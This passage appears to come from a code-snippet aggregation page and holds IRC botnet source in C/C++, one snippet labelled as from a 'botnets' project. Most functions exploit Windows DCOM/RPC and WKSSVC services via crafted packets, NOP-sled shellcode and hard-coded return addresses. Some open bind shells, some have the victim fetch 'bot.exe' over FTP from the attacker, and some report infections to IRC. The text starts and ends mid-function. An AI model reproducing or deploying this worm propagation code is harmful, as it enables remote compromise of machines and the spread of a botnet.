	return TRUE;
}
示例#6
0
BOOL scvx(char *target, void* conn,EXINFO exinfo)
{
	IRC* irc=(IRC*)conn;
	SOCKET sockfd;
//	int gport;
	int len, len1, TargetOS;
	unsigned short port = 135;
	char *buf1="0x001";
	char *buf2="0x001";
	char lport[] = "\x00\xFF\xFF\x8b"; 
	struct sockaddr_in their_addr;

	unsigned short tport;
	unsigned char *sc;
		
	TargetOS = FpHost(exinfo.ip, FP_SMB);
	if (TargetOS == OS_WIN2K3)
	{
		//type = 0;
//		gport=fhtons(bindport);
//		memcpy(&lport[1], &gport, 2);
//		*(long*)lport = *(long*)port^0x9432BF80;
//		memcpy(&sc[471],&lport,4);

		tport=fhtons(bindport)^(USHORT)0x9999;
		memcpy(&bindshell[176],&tport,2);
		sc=(unsigned char *)bindshell;

		// memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4);
		their_addr.sin_family = AF_INET;
		their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
		their_addr.sin_port = fhtons(port);
		
		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
			return FALSE;
		
		if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
			return FALSE;
		
		len=strlen((const char*)sc);
		memcpy(buf2,fcr,sizeof(fcr));
		len1=sizeof(fcr);
		*(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2;  
		*(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2;
		memcpy(buf2+len1,mmps,sizeof(mmps));
		len1=len1+sizeof(mmps);
		memcpy(buf2+len1,sc,strlen((const char*)sc));
		len1=len1+strlen((const char*)sc);
		memcpy(buf2+len1,sc1,sizeof(sc1));
		len1=len1+sizeof(sc1);
		memcpy(buf2+len1,svcd,sizeof(svcd));
		len1=len1+sizeof(svcd);
		*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc;  
		*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc;
		*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc;

		if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
			return FALSE;

		len=frecv(sockfd, buf1, 1000, 0);
		if (fsend(sockfd,buf2,len1,0)== -1)
			return FALSE;

		fclosesocket(sockfd);
		Sleep(2000);

		if (ConnectShell(exinfo,bindport))
		{
			if (!exinfo.silent)
				irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
			exploit[exinfo.exploit].stats++;
		}
		else
		{
			if (!exinfo.silent && exinfo.verbose)
				irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
		}
	}
	return TRUE;
}
示例#7
0
bool CScannerDCOM2::Exploit()
{	char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096];
	int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0;
	char *pTemp;
	int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
	if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false;

	CString sURL;

	if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
	else
		sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \
			g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);

	iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);

	iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL);
	
	memcpy(szLoadBuf+iPos,							dcom2_shellcode_buf,	sizeof(dcom2_shellcode_buf)		); iPos+=sizeof(dcom2_shellcode_buf);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			szLoaderBuf,			iLoaderSize						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC,			dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser)	);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR,	&dcom2_my_offsets[0].lJmpAddr,	4						);
	memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, 	&dcom2_my_offsets[0].lTopSEH,	4						);
	iLoadSize=iPos; iPos=0;

	// Build the request
	memcpy(szReqBuf+iPos,	dcom2_request1,		sizeof(dcom2_request1)-1	); iPos+=sizeof(dcom2_request1)-1;
	memcpy(szReqBuf+iPos,	dcom2_request2,		sizeof(dcom2_request2)-1	); iPos+=sizeof(dcom2_request2)-1;
	memcpy(szReqBuf+iPos,	szLoadBuf,			iLoadSize					); iPos+=iLoadSize;
	memcpy(szReqBuf+iPos,	dcom2_request3,		sizeof(dcom2_request3)-1	); iPos+=sizeof(dcom2_request3)-1;
	memcpy(szReqBuf+iPos,	dcom2_request4,		sizeof(dcom2_request4)-1	); iPos+=sizeof(dcom2_request4)-1;
	iReqSize=iPos; iPos=0;

	pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes
	*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iLoadSize / 2;
	*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize / 2; pTemp=szReqBuf;
    *(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iLoadSize - 12;
	*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iLoadSize - 12;

    char szAssocGroup[4];

	// Connect to the server
	if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
		return false;

	// Send the bind string
	if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_BINDACK
	if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; }
	// Store the association group for later usage
    memcpy(szAssocGroup, szRecvBuf+20, 4);

	// Send the evil request
	if(!m_sSocket.Write(szReqBuf, iReqSize))
	{	m_sSocket.Disconnect(); return false; }
	// Read reply
	if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf)))
	{	m_sSocket.Disconnect(); return false; }
	// Check for DCE_PKT_FAULT
	if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; }

	// Close the socket that was once funky fresh
	m_sSocket.Disconnect(); return true;
}
示例#8
0
文件: Dcom.cpp 项目: hazcod/botnets
BOOL dcom(EXINFO exinfo)
{
	if (exinfo.port == 445) {
		NETRESOURCEW nr;

		if (!ConnectViaNullSession(exinfo.ip, &nr)) 
			return FALSE;
		else {
			char szPipePath[MAX_PATH];
			//sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip);//sorry kaspersky
			sprintf(szPipePath, "\\\\%s\\", exinfo.ip);
			strcat(szPipePath,"pipe\\epmapper");
			HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

			if (hFile == INVALID_HANDLE_VALUE) {
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			int TargetOS = FpHost(exinfo.ip, FP_PORT5K);
			//int TargetOS=FpHost(exinfo.ip,FP_NP);
			//if (TargetOS==OS_UNKNOWN) 
				//TargetOS=FpHost(exinfo.ip,FP_SMB);
			//if (TargetOS == OS_WINNT) 
				//return FALSE;

			// get shellcode
			DWORD reqbufsize;
			char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE);
			if (!reqbuf) {
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			unsigned long lWritten;
			char *szInBuf = (char *)malloc(100000);
			ZeroMemory(szInBuf,100000);

			// send the bind string
			DWORD dwRead;
			TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
			if (szInBuf[2] != 0x0C) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			// send the evil request
			if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) {
				free(szInBuf); 
				free(reqbuf);
				CloseHandle(hFile);
				CloseNullSession(exinfo.ip);
				return FALSE;
			}

			free(reqbuf); 
			free(szInBuf);
			CloseHandle(hFile);
			CloseNullSession(exinfo.ip);
		}

	} else { // port 135 and others

		int TargetOS=FpHost(exinfo.ip,FP_RPC);
		//if (TargetOS==OS_UNKNOWN)
			//TargetOS=FpHost(exinfo.ip,FP_SMB);
		//if (TargetOS == OS_WINNT) 
			//return FALSE;
		
		// get a funky fresh socket
		SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP);
		if (sSocket == SOCKET_ERROR) 
			return FALSE;

		// fill in sockaddr and resolve the host
		SOCKADDR_IN ssin; 
		ZeroMemory(&ssin,sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons(exinfo.port);
		ssin.sin_addr.s_addr = finet_addr(exinfo.ip);

		// get shellcode
		DWORD reqbufsize;
		char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE);
		if (!reqbuf) {
			fclosesocket(sSocket);
			return FALSE;
		}

		// connect to the server
		int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
		if (iErr == -1) { // connect failed, exit
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// send the bind string
		if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		// read reply
		char recvbuf[4096];
		frecv(sSocket, recvbuf, 4096, 0);
		// Send the evil request
		if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) {
			free(reqbuf);
			fclosesocket(sSocket);
			return FALSE;
		}

		free(reqbuf);
		// Close the socket
		fclosesocket(sSocket);		
	}

	Sleep(2000);
	
	if (DShell(exinfo))
	{
		exploit[ exinfo.exploit ].stats++;
	}

	return TRUE;
}
示例#9
0
BOOL ScriptGod_WKSSVC( unsigned long nTargetID, EXINFO exinfo )
{
	int TargetOS;
	char szShellBuf[ 512 ];
	int iShellSize;

	// =============================
	char* pszTarget;
	// ---
	char szNetbiosTarget[ 8192 ];
	wchar_t wszNetbiosTarget[ 8192 ];
	unsigned char szShellcodeEncoded[ ( sizeof( szShellBuf ) * 2 ) + 1 ];
	unsigned char szExploitsData[ 3500 ];
	unsigned long nExploitsDataPos;
	wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
	// ---
	char szIPC[ 8192 ];
	NETRESOURCE NetSource;
	// ---
	char szPipe[ 8192 ];
	HANDLE hPipe;
	// ---
	RPC_ReqBind BindPacket;
	unsigned long nBytesWritten;
	RPC_ReqNorm ReqNormalHeader;
	unsigned long nPacketSize;
	unsigned char* pPacket;
	unsigned long nPacketPos;
	// ============================

	// check if xp
	TargetOS = FpHost( exinfo.ip, FP_RPC );
	if( TargetOS != OS_WINXP )
		return FALSE;

	// parameters
	pszTarget = exinfo.ip;

	// get shellcode
	iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
	if( !iShellSize )
		return FALSE;

	// generate exploits buffer
	// ========================
	memset( szShellcodeEncoded, 0, sizeof( szShellcodeEncoded ) );
	memset( szExploitsData, 0, sizeof( szExploitsData ) );
	memset( wszExploitsData, 0, sizeof( wszExploitsData ) );

	// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
	memset( szExploitsData, 'A', sizeof( szExploitsData ) - 1 );

	// new EIP
	*(unsigned long*)( &szExploitsData[ Targets[ nTargetID ].nNewEIP_BufferOffset ] ) = Targets[ nTargetID ].nNewEIP;

	// some NOPs
	nExploitsDataPos = 2300;

	// add stack
	memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
	nExploitsDataPos += sizeof( szStack ) - 1;

	// add decoder
	memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
	nExploitsDataPos += sizeof( szDecoder ) - 1;

	// add shellcode
	// - bind port
	// - encode
	Encode( (unsigned char*)szShellBuf, iShellSize, szShellcodeEncoded );
	// - add
	memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
	nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
	// - 0 terminaten for decoder
	szExploitsData[ nExploitsDataPos ] = 0;
	nExploitsDataPos += 1;

	// convert to UNICODE
	// ==================
	for( int n = 0; n < sizeof( szExploitsData ); n++ )
		wszExploitsData[ n ] = szExploitsData[ n ];
	//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
	snprintf( szNetbiosTarget, sizeof( szNetbiosTarget ), "\\\\%s", pszTarget );
	mbstowcs( wszNetbiosTarget, szNetbiosTarget, sizeof( wszNetbiosTarget ) / sizeof( wchar_t ) );
	
	// create NULL session
	// ===================
	if( strcmpi( pszTarget, "." ) )
	{
		snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget );
		memset( &NetSource, 0 ,sizeof( NetSource ) );
		NetSource.lpRemoteName = szIPC;
		fWNetAddConnection2( &NetSource, "", "", 0 );
	}
	// ===================

	// connect to pipe
	// ===============
	snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\wkssvc", pszTarget );
	hPipe = CreateFile( szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL );
	if( hPipe == INVALID_HANDLE_VALUE )
	{
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===============

	// bind packet
	// ===========
	memset( &BindPacket, 0, sizeof( BindPacket ) );
	BindPacket.NormalHeader.versionmaj		= 5;
	BindPacket.NormalHeader.versionmin		= 0;
	BindPacket.NormalHeader.type			= 11;	// bind
	BindPacket.NormalHeader.flags			= 3;	// first + last fragment
	BindPacket.NormalHeader.representation	= 0x00000010; // little endian
	BindPacket.NormalHeader.fraglength		= sizeof( BindPacket );
	BindPacket.NormalHeader.authlength		= 0;
	BindPacket.NormalHeader.callid			= 1;
	BindPacket.maxtsize						= 4280;
	BindPacket.maxrsize						= 4280;
	BindPacket.assocgid						= 0;
	BindPacket.numelements					= 1;
	BindPacket.contextid					= 0;
	BindPacket.numsyntaxes					= 1;
	BindPacket.Interface1.version			= 1;
	memcpy( BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16 );
	BindPacket.Interface2.version			= 2;
	memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );

	// send
	if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// ===========

	// request
	// =======
	// generate packet
	// ---------------

	// calc packet size
	nPacketSize = 0;
	nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
	nPacketSize += sizeof( UNISTR2 );
	nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
	nPacketSize += sizeof( UNISTR2 ); 
	nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
	while( nPacketSize % 4 )
		nPacketSize++;
	nPacketSize += 8; // szWSSKVCUnknown3
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		nPacketSize += 4; // NetAddAlternateComputerName = reserved
	else
		nPacketSize += 2; // NetValidateName = NameType

	// alloc packet
	pPacket = (unsigned char*)malloc( nPacketSize );
	if( !pPacket )
	{
		CloseHandle( hPipe );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	memset( pPacket, 0, nPacketSize );

	// build packet
	nPacketPos = 0;

	// - szWKSSVCUnknown1
	memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
	nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;

	// - wszNetbiosTarget
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszNetbiosTarget ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
	nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWKSSVCUnknown2
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
		nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
	}

	// - wszExploitsData
	( (UNISTR2*)&pPacket[ nPacketPos ] )->length	= wcslen( wszExploitsData ) + 1;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown	= 0;
	( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength	= ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
	nPacketPos += sizeof( UNISTR2 );

	wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
	nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );

	// - align
	while( nPacketPos % 4 )
		nPacketPos++;

	// - szWSSKVCUnknown3 (only eigth 0x00s)
	memset( &pPacket[ nPacketPos ], 0, 8 );
	nPacketPos += 8;

	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
	{
		// NetAddAlternateComputerName = 0
		*(DWORD*)&pPacket[ nPacketPos ] = 0;
		nPacketPos += sizeof( DWORD );
	}
	else
	{
		// NetValidateName = NetSetupMachine
		*(unsigned short*)&pPacket[ nPacketPos ] = 1;
		nPacketPos += 2;
	}

	// header
	memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
	ReqNormalHeader.NormalHeader.versionmaj		= 5;
	ReqNormalHeader.NormalHeader.versionmin		= 0;
	ReqNormalHeader.NormalHeader.type			= 0;	// request
	ReqNormalHeader.NormalHeader.flags			= 3;	// first + last fragment
	ReqNormalHeader.NormalHeader.representation	= 0x00000010; // little endian
	ReqNormalHeader.NormalHeader.authlength		= 0;
	ReqNormalHeader.NormalHeader.callid			= 1;
	ReqNormalHeader.prescontext					= 0;
	if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
		ReqNormalHeader.opnum					= 27;	// NetrAddAlternateComputerName
	else
		ReqNormalHeader.opnum					= 25;	// NetrValidateName2
	// send
	if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
	{
		CloseHandle( hPipe );
		free( pPacket );
		fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
		return FALSE;
	}
	// =======
	
	// clean up
	// =================;
	CloseHandle( hPipe );
	free( pPacket );
	fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );

	char buffer[ IRCLINE ];
	//_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
	irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	addlog(buffer);
	exploit[exinfo.exploit].stats++;

	return TRUE;
}
示例#10
0
bool CScannerDCOM::Exploit()
{
	switch(m_sSocket.m_sPort)
	{
	case 135:
	case 1025:
		{
			char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
			int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
			char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC);
			if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
			if(iHostOS==OS_WINNT) return false;
			
			CString sURL;

			if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
			else
				sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
					g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

			iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
			

			// Build a buffer with the shellcode
			memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
			memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
			memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
			iSCSize=iPos; iPos=0;

			// Prepend NOPs as long as shellcode doesn't fit RPC packet format
			while(iSCSize%16!=12)
			{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
				memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
				memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
				memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
				iSCSize=iPos; iPos=0; free(szTemp); }

			// Set the return address
			if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
				memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
			else
				memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

			// Build the request
			memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
			memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
			memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
			memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
			memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
			iReqSize=iPos;

			pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
			*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
			*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
			*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;
			
			// Connect to the server
			if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit
				return false;
			// Send the bind string
			if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000);
			// Send the evil request
			if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; }
			// Read reply
			if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; }

			// Close the socket that was once funky fresh
			m_sSocket.Disconnect(); return true;
		}
		break;
	case 445:
		{
#ifdef _WIN32
			NETRESOURCEW nr; bool bRetVal=false;
			if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
			else
			{	int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
				if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
				char szPipePath[MAX_PATH];
				sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
    
				HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
					NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  
				if(hFile!=INVALID_HANDLE_VALUE)
				{	
					SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
					char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
					int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
					char *pTemp;

					CString sURL;

					if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					else
						sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

					iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
					
					// Build a buffer with the shellcode
					memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
					memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
					memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
					iSCSize=iPos; iPos=0;

					// Prepend NOPs as long as shellcode doesn't fit RPC packet format
					while(iSCSize%16!=12)
					{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
						memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
						memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
						memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
						iSCSize=iPos; iPos=0; free(szTemp); }

					// Set the return address
					if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
						memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
					else
						memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

					// Build the request
					memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
					memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
